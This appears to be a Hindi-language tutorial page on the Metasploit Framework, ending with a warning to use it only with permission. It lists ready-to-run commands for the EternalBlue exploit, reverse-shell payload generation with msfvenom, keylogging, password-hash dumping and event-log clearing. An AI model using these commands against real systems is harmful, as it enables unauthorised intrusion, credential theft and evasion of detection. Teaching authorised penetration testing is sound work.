🎯 Metasploit Framework - World's Most Popular Exploitation Tool

💣 Exploitation Framework 🎯 Payload Generator 🛡️ Penetration Testing

Category: 6️⃣ Exploitation Tools


📝 Description

Metasploit Framework दुनिया का सबसे लोकप्रिय पेनिट्रेशन टेस्टिंग और एक्सप्लॉइटेशन फ्रेमवर्क है। यह Rapid7 द्वारा डेवलप किया जाता है। Metasploit में हजारों एक्सप्लॉइट्स, पेलोड्स, एनकोडर्स, और पोस्ट-एक्सप्लॉइटेशन मॉड्यूल शामिल हैं। यह आपको वल्नरेबिलिटीज को डिटेक्ट करने, एक्सप्लॉइट करने, और टारगेट सिस्टम पर कंट्रोल लेने की सुविधा देता है।

विशेषता: Metasploit की सबसे बड़ी खासियत है इसका मॉड्यूलर आर्किटेक्चर और इंटरएक्टिव कंसोल (msfconsole)। यह नए एक्सप्लॉइट्स और पेलोड्स को आसानी से जोड़ सकता है।

📦 Installation

Kali Linux (पहले से इंस्टॉल):

msfconsole

Ubuntu/Debian:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall

macOS:

brew install metasploit

Windows: Metasploit Installer डाउनलोड करें।

💻 Common Commands (उदाहरण सहित)

📌 Metasploit कंसोल (msfconsole) शुरू करना:

sudo msfconsole

🔹 1. सभी एक्सप्लॉइट्स देखना:

show exploits
👉 उदाहरण: सभी उपलब्ध एक्सप्लॉइट्स की लिस्ट दिखाता है।

🔹 2. किसी विशेष एक्सप्लॉइट को खोजना:

search eternalblue
👉 उदाहरण: eternalblue (MS17-010) से जुड़े एक्सप्लॉइट्स ढूँढता है।

🔹 3. एक्सप्लॉइट चुनना और उपयोग करना:

use exploit/windows/smb/ms17_010_eternalblue
👉 उदाहरण: EternalBlue एक्सप्लॉइट को सेलेक्ट करता है।

🔹 4. एक्सप्लॉइट के ऑप्शन देखना:

show options
👉 उदाहरण: RHOSTS (टारगेट), RPORT (पोर्ट) जैसे ऑप्शन दिखाता है।

🔹 5. टारगेट सेट करना:

set RHOSTS 192.168.1.100
👉 उदाहरण: टारगेट IP एड्रेस सेट करता है।

🔹 6. पेलोड सेट करना:

set PAYLOAD windows/x64/meterpreter/reverse_tcp
👉 उदाहरण: Meterpreter रिवर्स TCP पेलोड सेट करता है।

🔹 7. LHOST (लिसनर IP) सेट करना:

set LHOST 192.168.1.50
👉 उदाहरण: आपकी मशीन का IP (जहाँ कनेक्शन आना है)।

🔹 8. एक्सप्लॉइट चलाना:

exploit
👉 उदाहरण: एक्सप्लॉइट शुरू करता है। सफल होने पर Meterpreter सेशन मिलता है।

🔹 9. Meterpreter कमांड्स - सिस्टम जानकारी:

sysinfo
👉 उदाहरण: टारगेट सिस्टम की जानकारी (OS, CPU, आदि) दिखाता है।

🔹 10. फाइल सिस्टम ब्राउज़ करना:

ls
cd C:\\Users
pwd
👉 उदाहरण: टारगेट की फाइल्स देखना और डायरेक्टरी बदलना।

🔹 11. फाइल डाउनलोड/अपलोड करना:

download C:\\Users\\admin\\Desktop\\secret.txt /home/kali/
upload /home/kali/shell.exe C:\\Windows\\Temp\\
👉 उदाहरण: टारगेट से फाइल डाउनलोड और अपलोड करना।

🔹 12. स्क्रीनशॉट लेना:

screenshot
👉 उदाहरण: टारगेट डेस्कटॉप का स्क्रीनशॉट लेता है।

🔹 13. कीस्ट्रोक लॉगिंग:

keyscan_start
keyscan_dump
👉 उदाहरण: टारगेट पर टाइप किए गए कीस्ट्रोक्स कैप्चर करता है।

🔹 14. शेल प्राप्त करना:

shell
👉 उदाहरण: टारगेट पर कमांड शेल (cmd या bash) प्राप्त करता है।

🔹 15. बैकग्राउंड और सेशन लिस्ट:

background
sessions -l
sessions -i 1
👉 उदाहरण: सेशन को बैकग्राउंड में डालना और दूसरे सेशन में स्विच करना।

🔹 16. पेलोड जनरेट करना (msfvenom):

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o payload.exe
👉 उदाहरण: Windows के लिए Meterpreter पेलोड जनरेट करता है।

🔹 17. हैंडलर (Listener) सेट करना:

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444
exploit
👉 उदाहरण: पेलोड execute होने पर कनेक्शन प्राप्त करने के लिए हैंडलर सेट करता है।

🎯 Metasploit के मुख्य मॉड्यूल:

🎯 Use Cases (उपयोग के तरीके)

⚙️ Key Features (मुख्य विशेषताएँ)

📌 Meterpreter के महत्वपूर्ण कमांड्स:

  • sysinfo: सिस्टम जानकारी
  • getuid: वर्तमान यूजर
  • getsystem: सिस्टम प्रिविलेज प्राप्त करना
  • hashdump: पासवर्ड हैश डंप करना
  • screenshot: स्क्रीनशॉट लेना
  • keyscan_start / keyscan_dump: कीस्ट्रोक लॉगिंग
  • shell: कमांड शेल प्राप्त करना
  • upload / download: फाइल ट्रांसफर
  • migrate: दूसरे प्रोसेस में माइग्रेट करना
  • clearev: इवेंट लॉग क्लियर करना

📌 msfvenom के सामान्य पेलोड्स:

# Windows Meterpreter
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f exe -o shell.exe

# Linux Meterpreter
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f elf -o shell.elf

# Android APK
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -o app.apk

# PHP Webshell
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.0.0.5 LPORT=4444 -f raw -o shell.php

# Python
msfvenom -p python/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 -o shell.py

🔗 Official Resources

🔧 Related Tools (समान उपकरण)

⚠️ Important Note (सावधानी)

Metasploit एक बेहद शक्तिशाली एक्सप्लॉइटेशन फ्रेमवर्क है। इसका उपयोग केवल उन्हीं सिस्टम पर करें जिनकी आपको लिखित अनुमति हो। बिना अनुमति के एक्सप्लॉइट करना, पेलोड execute करना, या Meterpreter सेशन बनाना कानूनी अपराध है। हमेशा अपने खुद के सिस्टम, CTF चैलेंज, या बग बाउंटी प्रोग्राम पर ही प्रैक्टिस करें। Metasploit का उपयोग सीखने और सुरक्षा ऑडिट के लिए करें, न कि अनधिकृत पहुंच के लिए।